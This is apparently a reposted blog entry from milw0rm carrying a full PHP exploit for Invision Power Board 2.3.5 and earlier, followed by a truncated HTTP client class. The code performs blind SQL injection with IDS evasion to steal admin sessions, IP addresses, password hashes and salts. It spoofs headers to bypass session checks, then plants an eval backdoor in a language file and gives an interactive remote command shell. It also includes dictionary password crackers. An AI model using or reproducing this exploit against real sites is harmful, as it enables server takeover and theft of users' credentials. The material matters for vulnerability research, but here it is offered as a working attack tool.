Senza categoria

Exploit Invision Power Board <= 2.3.5

FONTE: MILW0RM

Invision Power Board < = 2.3.5 Multiple Vulnerabilities Exploit (revised) Codice: #!/usr/bin/php -q mhead();

# Gimme your args
$this->p_attack = $this->get_p(’attack’, true);
$this->p_prox = $this->get_p(’proxhost’);
$this->p_proxa = $this->get_p(’proxauth’);

$this->init_global();

# Proxy params
if( $this->p_prox )
{
$this->web->proxy($this->p_prox);

if( $this->p_proxa )
$this->web->proxyauth($this->p_proxa);
}

# Where do we go ?
switch( $this->p_attack )
{
case 1: $this->code_exec(); break;
case 2: $this->bf_sql_pwd(); break;
case 3: $this->bf_usr_pwd(); break;
default: $this->usage();
}

return;
}

function code_exec($loop=1)
{
# First loop
if( $loop == 1 )
{
$this->set_sql_param();
$this->set_sql_focus();

$this->p_acp = $this->get_p(’acp’);

# ACP path
if( !$this->p_acp )
{
# If the user changed the ACP directory, we can
# find it (if the “Remove ACP Link” option was not
# applied) by log in as an Admin, and then click
# on “Admin CP”. This can be done with a user
# but I didn’t implemented that
$this->msg(’Using default ACP path: admin’, 1);
$this->p_acp = ‘admin’;
}
else
$this->msg(’Using ACP path “‘.$this->p_acp.’”‘, 1);

# Init client headers:
# Only if we have the same IP as the targeted user (not admin),
# it resets session datas, so we try to spoof our
# IP as a random one in order to keep user’s session datas while
# we bruteforce SQL fields.
$this->bypass_matches();

# Remove expired sessions ( time() – 60*60*2 = > 2 hours )
$this->web->get($this->p_url.$this->p_acp.’/index.php?’);
$this->msg(’Removed all out of date admin sessions’, 1);

# Cookie prefix
$this->get_cprefix();
}

# Admin session ?
$this->msg(’Trying to find an admin session id’, 0);

# Got one :]
if( $this->get_admin_sess() )
{
$this->s_admin = true;
$this->s_sess = $this->data[‘a_sess_id’];
$this->a_url = $this->p_url.$this->p_acp.’/index.php?adsess=’.$this->s_sess;
}

# Nothing special
else
{
$this->s_admin = false;
$this->msg(’No admin session id found’, -1);
}

# User session ?
if( !$this->s_sess )
{
$this->msg(’Trying to find a user session id’, 0);

# Yep
if( $this->get_user_sess() )
$this->s_sess = $this->data[‘u_sess_id’];

# F0ck
else
{
$this->msg(’No user session id found’, -1);
$this->msg(’Admin session > 2 hours or user logged out’, 0);
$this->msg(’Keeping trying until the user connects’, 0);
$this->msg(’Entering loop #’.$loop.’ …’, 0);
$this->code_exec(++$loop);
}
}

$this->msg(’Getting security options’, 0);

# Security options
$this->get_sec_options();

# IP filter ?
if( $this->conf[‘ip’] === ‘1′ )
{
$this->s_bypass = true;

$this->msg(’IP filter option is turned on’, 0);

# Spoofing protection ?
if( !$this->conf[‘xforward’] )
{
# Assuming our IP isn’t the same etc..
$this->msg(’Can\’t bypass the IP filter’, -1);
exit(1);
}

# X-Forwarded-For / Client-IP /
# Proxy-User / X-Cluster-Client-IP
else
{
$this->msg(’Cool, we can spoof our IP (Client-IP)’, 1);

if( $this->s_admin )
{
$this->msg(’Trying to find admin\’s last IP’, 0);

# Admin IP found
$this->get_admin_ip();
$this->s_ip = $this->data[‘a_ip_addr’];
}
else
{
$this->s_admin = false;
$this->msg(’Trying to find user\’s last used IP’, 0);

# User IP found
$this->get_user_ip();
$this->s_ip = $this->data[‘u_ip_addr’];
}

# Nothing found
if( !$this->s_ip )
{
# Ahah (:
$this->msg(’No IP found for this user’, -1);
$this->give_hope();
}

# Got one !
else
$this->msg(’Ok, using IP ‘.$this->s_ip, 1);
}
}

# User-Agent filter ?
if( $this->conf[‘browser’] === ‘1′ && !$this->s_admin )
{
$this->s_bypass = true;

$this->msg(’Trying to find a valid user-agent’, 0);

# Good
if( $this->get_user_agent() )
{
$this->msg(’Ok, using user-agent ‘.substr($this->data[‘u_agent’], 0, 10).’…’, 1);
$this->s_agent = $this->data[‘u_agent’];
}

# WTF :!
else
{
$this->msg(’No user-agent found for this user’, -1);
$this->msg(’Maybe the browser didn\’t send this header’, 0);
$this->s_agent = ”;
}

}

# Cool !?
if( !$this->s_bypass )
$this->msg(’Cool, nothing to bypass’, 1);

$this->msg(’Trying to log in’, 0);

# Owned =]
if( $this->is_logged() )
{
# PHP code
if( $this->s_admin )
{
$this->msg(’Logged in with an admin session’, 1);
$this->exec_code();
}

# Normal user ?
else
{
$this->msg(’Logged in with a user session’, 1);
$this->msg(’You can log in using the cookie session_id’, 1);

if( $this->s_ip !== $this->def_ip )
$this->msg(’Set the Client-IP header to: ‘.$this->s_ip, 1);

if( $this->s_agent )
$this->msg(’Set the User-Agent header to: ‘.$this->s_agent, 1);

exit(0);
}
}
else
{
# Even if the admin logged out .. the admin session
# is still valid
$this->msg(’Can\’t log in, the session has expired ?!’, -1);
$this->give_hope();
}

return;
}

function bf_sql_pwd()
{
$this->p_ip = $this->get_p(’ip’, true);
$this->p_dict = $this->get_p(’dict’, true);

$this->p_sql_u = $this->get_p(’sqlusr’);

$this->p_url = $this->get_p(’url’);
$this->p_uname = $this->get_p(’uname’);
$this->p_pwd = $this->get_p(’pwd’);
// or
$this->p_uid = $this->get_p(’uid’);
$this->p_hash = $this->get_p(’passhash’);
$this->p_shold = $this->get_p(’stronghold’);

if( $this->p_uname && $this->p_pwd && $this->p_url )
{
$this->get_cprefix();

$this->msg(’Trying to get some cookies’, 0);

$g_dat = ‘index.php?act=Login&CODE=01&CookieDate=1′;
$p_dat = ‘UserName=’.$this->p_uname.’&PassWord=’.$this->p_pwd.’&x=0&y=0′;

$this->web->post($this->p_url.$g_dat, $p_dat);

$this->p_uid = $this->web->cookie[$this->s_cprefix.’member_id’];
$this->p_hash = $this->web->cookie[$this->s_cprefix.’pass_hash’];
$this->p_shold = $this->web->cookie[$this->s_cprefix.’ipb_stronghold’];
}
elseif( !$this->p_uid || !$this->p_hash || !$this->p_shold )
$this->usage();

if( !$this->p_uid || !$this->p_hash || !$this->p_shold )
{
$this->msg(’Can\’t get cookies’, -1);
$this->msg(’You should try with other parameters’, -1);
exit(1);
}

$this->msg(’Ok, using cookies:’, 1);

$this->msg(’member_id=’.$this->p_uid, 1);
$this->msg(’pass_hash=’.$this->p_hash, 1);
$this->msg(’ipb_stronghold=’.$this->p_shold, 1);

if( !$this->p_sql_u )
{
$this->set_sql_param();

$this->msg(’Trying to get the current sql user’, 0);

if( !$this->get_sql_user() )
{
$this->msg(’Can\’t get the sql user’, -1);
$this->msg(’If you know the sql user, use -sqlusr’, -1);
exit(1);
}
else
$this->p_sql_u = $this->data[‘sql_user’];
}

$this->msg(’Ok, using sql user ‘.$this->p_sql_u, 1);

$dico_c = file($this->p_dict);
$ip_a = explode(’.’, $this->p_ip);

$this->msg(’Entering local dictionnary attack (’.count($dico_c).’ words)’, 0);
$this->msg(’You should take a drink …’, 0);

foreach( $dico_c as $line )
{
$md5 = md5(trim($line).$this->p_sql_u);
$md5 = md5($this->p_uid.’-’.$ip_a[0].’-’.$ip_a[1].’-’.$this->p_hash).$md5;
$md5 = md5($md5);

if( $this->p_shold === $md5 )
{
$this->msg(’Found something cool =]’, 1);
$this->msg(’SQL password: ‘.$line, 1);
exit(1);
}

}

$this->msg(’End of the wordlist, password not found’, -1);

return;
}

function bf_usr_pwd()
{
$this->p_dict = $this->get_p(’dict’, true);

$this->p_hash = $this->get_p(’passhash’);
$this->p_salt = $this->get_p(’salt’);

if( !$this->p_hash || !$this->p_salt )
{
$this->set_sql_param();
$this->set_sql_focus();
}

if( !$this->p_hash )
{
$this->msg(’Trying to get the password hash’, 0);

if( !$this->get_pass_hash() )
{
$this->msg(’Can\’t get the password hash’, -1);
exit(1);
}
else
$this->p_hash = $this->data[‘pass_hash’];
}

$this->msg(’Ok, using hash ‘.$this->p_hash, 1);

if( !$this->p_salt )
{
$this->msg(’Trying to get the password salt’, 0);

if( !$this->get_pass_salt() )
{
$this->msg(’Can\’t get the password salt’, -1);
exit(1);
}
else
$this->p_salt = $this->data[‘pass_salt’];
}

$this->msg(’Ok, using salt ‘.$this->p_salt, 1);

$dico_c = file($this->p_dict);

$this->msg(’Entering local dictionnary attack (’.count($dico_c).’ words)’, 0);
$this->msg(’You should take a drink …’, 0);

foreach( $dico_c as $line )
{
if( $this->p_hash === md5(md5($this->p_salt).md5(trim($line))) )
{
$this->msg(’Found something cool =]’, 1);
$this->msg(’User password: ‘.$line, 1);
exit(1);
}
}

$this->msg(’End of the wordlist, password not found’, -1);

return;
}

function set_sql_param()
{
$this->p_url = $this->get_p(’url’, true);
$this->p_pre = $this->get_p(’prefix’);

# Table prefix
if( !$this->p_pre )
{
# Default table prefix if not precised
$this->msg(’Using default table prefix: ibf_’, 1);
$this->p_pre = ‘ibf_’;
}
else
$this->msg(’Using table prefix ‘.$this->p_pre, 1);

}

function set_sql_focus()
{
$this->p_uname = $this->get_p(’uname’);
$this->p_uid = $this->get_p(’uid’);

if( $this->p_uname )
$this->msg(’Using targeted username ‘.$this->p_uname, 1);

elseif( $this->p_uid )
$this->msg(’Using targeted user id ‘.$this->p_uid, 1);

# Target
if( !($this->p_uname || $this->p_uid) )
{
# Default uid if not precised
$this->msg(’Using default user id: 1′, 1);
$this->p_uid = 1;
}

# Focus on ?
if( $this->p_uname )
$this->t_on = ‘members_l_username=\”.addslashes($this->p_uname).’\”;

else
$this->t_on = ‘id=’.(int)$this->p_uid;

return;
}

function exec_code()
{
$this->write_code();

while( $this->cmd_prompt() )
{
$this->web->addheader(’My-Code’, $this->cmd);
$this->web->get($this->p_url);

print “\n”.$this->get_answer();
}

exit(0);
}

function get_answer()
{
$res_a = explode($this->res_sep, $this->web->getcontent());

if( !$res_a[1] )
return ‘No result to retrieve’;

else
return $res_a[1];
}

function cmd_prompt()
{
$this->cmd = $this->msg(’[email protected]: ‘, 1, 1, 0, true);

if( !ereg(’^(quit|exit)$’, $this->cmd) )
{
$this->cmd = base64_encode($this->cmd);
$this->cmd = str_replace(’%CMD%’, $this->cmd, $this->php_send);

return TRUE;
}

else
return FALSE;
}

function write_code()
{
# Gimme the language ID
$this->get_def_lang();

# Current lang settings
$p_dat =
‘code=edit2&act=lang&id=’.$this->g_lid.’&section’.
‘=lookandfeel&lang_file=lang_boards.php’;

$this->web->post($this->a_url, $p_dat);

# We collect each variable name / value
if( preg_match_all($this->reg_lvar, $this->web->getcontent(), $l_vars) )
{
# POST data
$p_dat =
‘code=doedit&act=lang&id=’.$this->g_lid.
‘&lang_file=lang_boards.php&section=lo’.
‘okandfeel&’;

# &Name=Value
for( $i=0; $iphp_write;
}

# Go on
$this->web->post($this->a_url, $p_dat);

$this->msg(’PHP code written’, 1);
}
else
{
# WTF :!
$this->msg(’Can\’t find block variables’, 0);
exit(1);
}

return;
}

function get_def_lang()
{
$this->msg(’Trying to get the set language id’, 0);

$this->web->get($this->a_url.’&section=lookandfeel&act=lang’);

if( preg_match($this->reg_lang, $this->web->getcontent(), $lids) )
{
$this->g_lid = $lids[1];
$this->msg(’Using language id ‘.$this->g_lid, 1);
}
else
{
$this->msg(’Can\’t get the default language id’, -1);
exit(1);
}

return;
}

function is_logged()
{
$this->bypass_matches();

# User session ok ?
if( !$this->s_admin )
{
$match = ‘act=Login&CODE=03′;
$this->web->addcookie($this->s_cprefix.’session_id’, $this->s_sess);
$this->web->get($this->p_url);
}

# Admin session ok ?
else
{
$match = ‘&section=’;
$this->web->get($this->a_url);
}

if( preg_match(”/$match/i”, $this->web->getcontent()) )
return true;

else
return false;
}

function bypass_matches()
{
# match_browser
$this->web->agent($this->s_agent);

# match_ipaddress
$this->web->addheader(’Client-IP’, $this->s_ip);

return;
}

function get_cprefix()
{
$this->msg(’Trying to get the cookie prefix’, 0);

# Set-Cookie: session_id=…; path=/
$this->web->get($this->p_url);

$this->s_cprefix = ”;

if( $this->web->cookie )
{
foreach( $this->web->cookie as $name => $value)
{
if( preg_match($this->reg_cpre, $name, $cmatches) )
{
$this->s_cprefix = $cmatches[1];
break;
}
}
}

if( !$this->s_cprefix )
$this->msg(’No cookie prefix set’, 1);

else
$this->msg(’Using cookie prefix ‘.$this->s_cprefix, 1);

return;
}

function get_sec_options()
{
# If no value, take the default one
$this->get_conf(’t.conf_value’);
$this->get_conf(’t.conf_default’);

return;
}

function get_conf($field)
{
$this->init_sql();

$this->t_table = ‘conf_settings’;
$this->t_field = $field;
$this->t_char = $this->chr_num;

$this->t_add_0 = “AND t.conf_key=’match_browser’”;

if( $this->conf[‘browser’] === ” )
$this->conf[‘browser’] = $this->bf_inj();

$this->t_add_0 = “AND t.conf_key=’match_ipaddress’”;

if( $this->conf[‘ip’] === ” )
$this->conf[‘ip’] = $this->bf_inj();

$this->t_add_0 = “AND t.conf_key=’xforward_matching’”;

if( $this->conf[‘xforward’] === ” )
$this->conf[‘xforward’] = $this->bf_inj();

return;
}

function get_login_key()
{
$this->init_sql();

$this->t_key = ‘login_key’;
$this->t_table = ‘members’;
$this->t_field = ‘t.member_login_key’;
$this->t_join = ‘t.id=m.id’;
$this->t_char = $this->chr_md5;
$this->data[‘login_key’] = $this->bf_inj();

return $this->key_val;
}

function get_sql_user()
{
$this->init_sql();

$this->t_key = ‘user()’;
$this->t_table = ‘members’;
$this->t_field = ‘user()’;
$this->t_char = $this->chr_all;
$this->t_end = ‘@’;
$this->data[‘sql_user’] = $this->bf_inj();

return $this->key_val;
}

function get_pass_hash()
{
$this->init_sql();

$this->t_key = ‘pass_hash’;
$this->t_table = ‘members_converge’;
$this->t_field = ‘t.converge_pass_hash’;
$this->t_join = ‘t.converge_email=m.email’;
$this->t_char = $this->chr_md5;
$this->data[‘pass_hash’] = $this->bf_inj();

return $this->key_val;
}

function get_pass_salt()
{
$this->init_sql();

$this->t_key = ‘pass_salt’;
$this->t_table = ‘members_converge’;
$this->t_field = ‘t.converge_pass_salt’;
$this->t_join = ‘t.converge_email=m.email’;
$this->t_char = $this->chr_all;
$this->data[‘pass_salt’] = $this->bf_inj();

return $this->key_val;
}

function get_admin_sess()
{
$this->init_sql();

$this->t_key = ‘admin_sid’;
$this->t_table = ‘admin_sessions’;
$this->t_field = ‘t.session_id’;
$this->t_join = ‘t.session_member_id=m.id’;
$this->t_sel = ‘t.session_log_in_time’;
$this->t_char = $this->chr_md5;
$this->data[‘a_sess_id’] = $this->bf_inj();

return $this->key_val;
}

function get_admin_ip()
{
$this->init_sql();

$this->t_key = ‘admin_ip’;
$this->t_table = ‘admin_sessions’;
$this->t_field = ‘t.session_ip_address’;
$this->t_join = ‘t.session_member_id=m.id’;
$this->t_sel = ‘t.session_log_in_time’;
$this->t_char = $this->chr_ip;
$this->data[‘a_ip_addr’] = $this->bf_inj();

return $this->key_val;
}

function get_admin_pwd()
{
$this->init_sql();

$this->t_key = ‘admin_pwd’;
$this->t_table = ‘admin_login_logs’;
$this->t_field = ‘t.admin_post_details’;
$this->t_join = ‘t.admin_username=m.members_l_username’;
$this->t_sel = ‘t.admin_id’;
$this->t_end = ‘”‘;
$this->t_bchar = -4; # “;}}
$this->t_char = $this->chr_all;
$this->data[‘a_pwd_like’]= $this->bf_inj();

return $this->key_val;
}

function get_user_sess()
{
$this->init_sql();

$this->t_key = ‘user_sid’;
$this->t_table = ’sessions’;
$this->t_field = ‘t.id’;
$this->t_join = ‘t.member_id=m.id’;
$this->t_sel = ‘t.running_time’;
$this->t_char = $this->chr_md5;
$this->data[‘u_sess_id’] = $this->bf_inj();

return $this->key_val;
}

function get_user_ip()
{
$this->init_sql();

$this->t_key = ‘user_ip’;
$this->t_table = ’sessions’;
$this->t_field = ‘t.ip_address’;
$this->t_join = ‘t.member_id=m.id’;
$this->t_sel = ‘t.running_time’;
$this->t_char = $this->chr_ip;
$this->data[‘u_ip_addr’] = $this->bf_inj();

return $this->key_val;
}

function get_user_agent()
{
$this->init_sql();

$this->t_key = ‘user_agent’;
$this->t_table = ’sessions’;
$this->t_field = ‘t.browser’;
$this->t_join = ‘t.member_id=m.id’;
$this->t_sel = ‘t.running_time’;
$this->t_char = $this->chr_all;
$this->data[‘u_agent’] = $this->bf_inj();

return $this->key_val;
}

function init_sql()
{
# SQL Injection params
$this->t_end = null;
$this->t_add_0 = ”;
$this->t_add_1 = ”;
$this->t_sel = ‘1′;
$this->t_bchar = 0;
$this->t_join = ”;
$this->t_key = ”;
$this->t_add_1 = ‘ORDER BY id DESC LIMIT 1′;

return;
}

function init_global()
{
# Charsets
$this->chr_spe = str_split(’ :/;*(-.!,?§*µù%$£^¨=+})°]àç^_\\`è|[\'{#é~&²”@’);
$this->chr_num = range(0, 9);
$this->chr_md5 = array_merge( $this->chr_num, range(‘a’, ‘f’) );
$this->chr_ip = array_merge( $this->chr_num, array(‘.’) );
$this->chr_all = array_merge( $this->chr_num, range(‘a’, ‘z’) );
$this->chr_all = array_merge( range(‘A’, ‘Z’), $this->chr_all, $this->chr_spe );

# SQL Injection
$this->def_param = ‘index.php?s=&act=xmlout&do=check-display-name&name=%rep_inj%’;

# IDS Evasion via %0D
$this->def_inj = “‘ OR 1=\”‘\” U%0DNION %rep_req% OR 1=\”‘\” %rep_add% #”;

# Results
$this->data = array();
$this->conf = array(‘ip’ => ”, ‘browser’ => ”, ‘xforward’ => ”);

# Misc
$this->stat = array(-1 => ‘-‘, 0 => ‘/’, 1 => ‘+’);
$this->s_bypass = false;
$this->res_sep = md5(rand());
$this->def_ip = rand(0,255).’.’.rand(0,255).’.’.rand(0,255).’.’.rand(0,255);

# PHP Code
$this->php_write = ‘${${@eval($_SERVER[HTTP_MY_CODE])}}’;
$this->php_send = “print(’$this->res_sep’);@system(base64_decode(’%CMD%’));”;
$this->php_send .= “print(’$this->res_sep’);exit(0);”;

# Regex
$this->reg_lang = ‘#[\r\n]*.*[\r\n]*.*code=export&id=([0-9]+)#i’;
$this->reg_lvar = “#id=’XX_([\w]+)’[\x20]+class=’multitext’>(.*)#i”;
$this->reg_cpre = ‘#^(.*)session_id$#’;
# $this->reg_acp = ‘#s_agent = ‘Mozilla Firefox’;
$this->s_ip = $this->def_ip;

return;
}

function bf_inj()
{
$this->sub_chr = $this->t_bchar;
$this->key_val = ”;

if( !empty($this->t_key) )
$this->msg(”, 0);

while( true )
{
if( $this->t_bchar < 0 ) $this->sub_chr–;

else
$this->sub_chr++;

# 0-9a-f
for( $j=0;$j< =count($this->t_char);$j++ )
{
# That one ?
$chr = $this->t_char[$j];

# Latest char ?
if( $j === count($this->t_char) )
$chr = $this->t_end;

# Ascii num
$asc = ord($chr);

# Screen bug
if( !empty($this->t_key) )
{
$msg = $this->t_key.’=’.$this->key_val;
$msg .= ($chr === $this->t_end ? “\x20″ : $chr);

$this->msg($msg, 0, 1, 1);
}

# Focus on the target ?
if( !empty($this->t_join) )
{
$inj =
‘SEL%0DECT 1,’.$this->t_sel.’ FR%0DOM ‘.$this->p_pre.$this->t_table.
‘ t, ‘.$this->p_pre.’members m WH%0DERE ‘.$this->t_join.
‘ AND m.’.$this->t_on.’ AND ASC%0DII(SUBS%0DTR(’.$this->t_field.
‘,’.$this->sub_chr.’,1))=’.$asc.’ ‘.$this->t_add_0;
}
else
{
$inj =
‘SEL%0DECT 1,’.$this->t_sel.’ FR%0DOM ‘.$this->p_pre.$this->t_table.
‘ t WH%0DERE ASC%0DII(SUB%0DSTR(’.$this->t_field.’,’.$this->sub_chr.
‘,1))=’.$asc.’ ‘.$this->t_add_0;
}

# SQL Injection via rawurldecode()
$inj = str_replace(’%rep_req%’, $inj, $this->def_inj);
$inj = str_replace(’%rep_add%’, $this->t_add_1, $inj);
$inj = str_replace(array(’”‘, “‘”), array(’%2522′, ‘%2527′), $inj);

# Params
$inj = str_replace(’%rep_inj%’, $inj, $this->def_param);
$inj = str_replace(array(’ ‘, ‘#’), array(’%20′, ‘%23′), $inj);

$this->web->get($this->p_url.$inj);

# Ok !?
if( !strstr($this->web->getcontent(), ‘notfound’) )
{
if( $chr !== $this->t_end )
{
$this->key_val .= $chr;
break;
}
}

# End
if( $chr === $this->t_end )
{
# Reverse
if( $this->t_bchar < 0 ) $this->key_val = strrev($this->key_val);

if( !empty($this->t_key) )
$this->msg($this->t_key.’=’.$this->key_val, 1, 1, 1);

return $this->key_val;
}
}
}

}

function get_p($p, $exit=false)
{
global $argv;

foreach( $argv as $key => $value )
{
if( $value === ‘-’.$p )
{
if( isset($argv[$key+1]) && !empty($argv[$key+1]) )
{
return $argv[$key+1];
}
else
{
if( $exit )
$this->usage();

return true;
}
}
}

if( $exit )
$this->usage();

return false;
}

function msg($msg, $nstatus, $nspace=1, $ndel=0, $ask=false)
{
if( $ndel ) $type = “\r”;
else $type = “\n”;

# wtf (:
print
(
$type.str_repeat(”\x20″, $nspace).
$this->stat[$nstatus].”\x20″.$msg
);

if( $ask )
return trim(fgets(STDIN));
}

function give_hope()
{
$this->msg(’You should try with another user or try another time’, -1);

exit(1);
}

function mhead()
{
# Advisory: http://acid-root.new.fr/?0:18

print “\n Invision Power Board < = 2.3.5 Multiple Vulnerabilities”; print “\n ——————————————————”; print “\n\n About:”; print “\n\n by DarkFig < gmdarkfig (at) gmail (dot) com >”;
print “\n http://acid-root.new.fr/”;
print “\n #[email protected]”;
print “\n\n\n Attack(s):\n”;

return;
}

function usage()
{

print “\n -attack [options]\n\n”;
print “ 1 – PHP code execution\n\n”;
print “ -url IPB url with ending slash\n\n”;
print “ -uname targeted username\n”;
print “ -uid OR the targeted user id (def: 1)\n\n”;
print “ -prefix sql table prefix (def: ibf_)\n”;
print “ -acp admin control panel path (def: admin)\n\n\n”;
print “ 2 – Insecure SQL password usage\n\n”;
print “ -ip your current IP\n”;
print “ -dict a wordlist file\n\n”;
print “ -url IPB url with ending slash\n”;
print “ -uname a valid member username\n”;
print “ -pwd the associated password\n\n”;
print “ -uid OR the targeted member id\n”;
print “ -passhash the passhash cookie value\n”;
print “ -stronghold the stronghold cookie value\n\n”;
print “ -sqlusr you can precise the sql user\n”;
print “ -prefix sql table prefix (def: ibf_)\n\n\n”;
print “ 3 – Password bruteforcer\n\n”;
print “ -dict a wordlist file\n\n”;
print “ -url IPB url with ending slash\n”;
print “ -uname targeted username\n”;
print “ -uid OR the targeted user id (def: 1)\n”;
print “ -prefix sql table prefix (def: ibf_)\n\n”;
print “ -passhash OR the passhash value\n”;
print “ -salt the salt value\n\n\n”;
print “ Optional: \n\n”;
print “ -proxhost if you wanna use a proxy\n”;
print “ -proxauth proxy with authentication\n”;

exit(1);
}

}

/*
*
* Copyright (C) darkfig
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version 2
* of the License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place – Suite 330, Boston, MA 02111-1307, USA.
*
* TITLE: PhpSploit Class
* REQUIREMENTS: PHP 4 / PHP 5
* VERSION: 2.1
* LICENSE: GNU General Public License
* ORIGINAL URL: http://www.acid-root.new.fr/tools/03061230.txt
* FILENAME: phpsploitclass.php
*
* CONTACT: [email protected] (french / english)
* GREETZ: Sparah, Ddx39
*
* DESCRIPTION:
* The phpsploit is a class implementing a web user agent.
* You can add cookies, headers, use a proxy server with (or without) a
* basic authentification. It supports the GET and the POST method. It can
* also be used like a browser with the cookiejar() function (which allow
* a server to add several cookies for the next requests) and the
* allowredirection() function (which allow the script to follow all
* redirections sent by the server). It can return the content (or the
* headers) of the request. Others useful functions can be used for debugging.
* A manual is actually in development but to know how to use it, you can
* read the comments.
*
* CHANGELOG:
*
* [2008-08-29] (2.1)
* * New: The showheader()/showcookie() functions can now return an array
* * Bug #3 fixed: Problem concerning some servers for the main function
*
* [2007-06-10] (2.0)
* * Code: Code optimization
* * New: Compatible with PHP 4 by default
*
* [2007-01-24] (1.2)
* * Bug #2 fixed: Problem concerning the getcookie() function ((|;))
* * New: multipart/form-data enctype is now supported
*
* [2006-12-31] (1.1)
* * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)
* * New: You can now call the getheader() / getcontent() function without parameters
*
* [2006-12-30] (1.0)
* * First version
*
*/

class phpsploit
{
var $proxyhost;
var $proxyport;
var $host;
var $path;
var $port;
var $method;
var $url;
var $packet;
var $proxyuser;
var $proxypass;
var $header;
var $cookie;
var $data;
var $boundary;
var $allowredirection;
var $last_redirection;
var $cookiejar;
var $recv;
var $cookie_str;
var $header_str;
var $server_content;
var $server_header;

/**
* This function is called by the
* get()/post()/formdata() functions.
* You don’t have to call it, this is
* the main function.
*
* @access private
* @return string $this->recv ServerResponse
*
*/
function sock()
{
if(!empty($this->proxyhost) && !empty($this->proxyport))
$socket = @fsockopen($this->proxyhost,$this->proxyport);
else
$socket = @fsockopen($this->host,$this->port);

if(!$socket)
die(”Error: Host seems down”);

if($this->method==’get’)
$this->packet = ‘GET ‘.$this->url.” HTTP/1.1\r\n”;

elseif($this->method==’post’ or $this->method==’formdata’)
$this->packet = ‘POST ‘.$this->url.” HTTP/1.1\r\n”;

else
die(”Error: Invalid method”);

if(!empty($this->proxyuser))
$this->packet .= ‘Proxy-Authorization: Basic ‘.base64_encode($this->proxyuser.’:’.$this->proxypass).”\r\n”;

if(!empty($this->header))
$this->packet .= $this->showheader();

if(!empty($this->cookie))
$this->packet .= ‘Cookie: ‘.$this->showcookie().”\r\n”;

$this->packet .= ‘Host: ‘.$this->host.”\r\n”;
$this->packet .= “Connection: Close\r\n”;

if($this->method==’post’)
{
$this->packet .= “Content-Type: application/x-www-form-urlencoded\r\n”;
$this->packet .= ‘Content-Length: ‘.strlen($this->data).”\r\n\r\n”;
$this->packet .= $this->data.”\r\n”;
}
elseif($this->method==’formdata’)
{
$this->packet .= ‘Content-Type: multipart/form-data; boundary=’.str_repeat(’-‘,27).$this->boundary.”\r\n”;
$this->packet .= ‘Content-Length: ‘.strlen($this->data).”\r\n\r\n”;
$this->packet .= $this->data;
}

$this->packet .= “\r\n”;
$this->recv = ”;

fputs($socket, $this->packet);

while(!feof($socket))
$this->recv .= fgets($socket);

fclose($socket);

if($this->cookiejar)
$this->getcookie();

if($this->allowredirection)
return $this->getredirection();
else
return $this->recv;
}

/**
* This function allows you to add several
* cookies in the request.
*
* @access public
* @param string cookn CookieName
* @param string cookv CookieValue
* @example $this->addcookie(’name’,’value’)
*
*/
function addcookie($cookn,$cookv)
{
if(!isset($this->cookie))
$this->cookie = array();

$this->cookie[$cookn] = $cookv;
}

/**
* This function allows you to add several
* headers in the request.
*
* @access public
* @param string headern HeaderName
* @param string headervalue Headervalue
* @example $this->addheader(’Client-IP’, ‘128.5.2.3′)
*
*/
function addheader($headern,$headervalue)
{
if(!isset($this->header))
$this->header = array();

$this->header[$headern] = $headervalue;
}

/**
* This function allows you to use an
* http proxy server. Several methods
* are supported.
*
* @access public
* @param string proxy ProxyHost
* @param integer proxyp ProxyPort
* @example $this->proxy(’localhost’,8118)
* @example $this->proxy(’localhost:8118′)
*
*/
function proxy($proxy,$proxyp=”)
{
if(empty($proxyp))
{
$proxarr = explode(’:’,$proxy);
$this->proxyhost = $proxarr[0];
$this->proxyport = (int)$proxarr[1];
}
else
{
$this->proxyhost = $proxy;
$this->proxyport = (int)$proxyp;
}

if($this->proxyport > 65535)
die(”Error: Invalid port number”);
}

/**
* This function allows you to use an
* http proxy server which requires a
* basic authentification. Several
* methods are supported:
*
* @access public
* @param string proxyauth ProxyUser
* @param string proxypass ProxyPass
* @example $this->proxyauth(’user’,’pwd’)
* @example $this->proxyauth(’user:pwd’);
*
*/
function proxyauth($proxyauth,$proxypass=”)
{
if(empty($proxypass))
{
$posvirg = strpos($proxyauth,’:’);
$this->proxyuser = substr($proxyauth,0,$posvirg);
$this->proxypass = substr($proxyauth,$posvirg+1);
}
else
{
$this->proxyuser = $proxyauth;
$this->proxypass = $proxypass;
}
}

/**
* This function allows you to set
* the ‘User-Agent’ header.
*
* @access public
* @param string useragent Agent
* @example $this->agent(’Firefox’)
*
*/
function agent($useragent)
{
$this->addheader(’User-Agent’,$useragent);
}

/**
* This function returns the headers
* which will be in the next request.
*
* @access public
* @return string $this->header_str Headers
* @return array $this->head Headers
* @example $this->showheader()
* @example $this->showheader(1)
*
*/
function showheader($array=”)
{
$this->header_str = ”;

if(!isset($this->header))
return;

if(!empty($array))
return $this->header;

foreach($this->header as $name => $value)
$this->header_str .= $name.’: ‘.$value.”\r\n”;

return $this->header_str;
}

/**
* This function returns the cookies
* which will be in the next request.
*
* @access public
* @return string $this->cookie_str Cookies
* @return array $this->cookie Cookies
* @example $this->showcookie()
* @example $this->showcookie(1)
*
*/
function showcookie($array=”)
{
if(!isset($this->cookie))
return;

if(!empty($array))
return $this->cookie;

$this->cookie_str = ”;

foreach($this->cookie as $name => $value)
$this->cookie_str .= $name.’=’.$value.’; ‘;

return $this->cookie_str;
}

/**
* This function returns the last
* formed http request.
*
* @access public
* @return string $this->packet HttpPacket
* @example $this->showlastrequest()
*
*/
function showlastrequest()
{
if(!isset($this->packet))
return;
else
return $this->packet;
}

/**
* This function sends the formed
* http packet with the GET method.
*
* @access public
* @param string url Url
* @return string $this->sock()
* @example $this->get(’localhost/index.php?var=x’)
* @example $this->get(’http://localhost:88/tst.php’)
*
*/
function get($url)
{
$this->target($url);
$this->method = ‘get’;
return $this->sock();
}

/**
* This function sends the formed
* http packet with the POST method.
*
* @access public
* @param string url Url
* @param string data PostData
* @return string $this->sock()
* @example $this->post(’http://localhost/’,’helo=x’)
*
*/
function post($url,$data)
{
$this->target($url);
$this->method = ‘post’;
$this->data = $data;
return $this->sock();
}

/**
* This function sends the formed http
* packet with the POST method using
* the multipart/form-data enctype.
*
* @access public
* @param array array FormDataArray
* @return string $this->sock()
* @example $formdata = array(
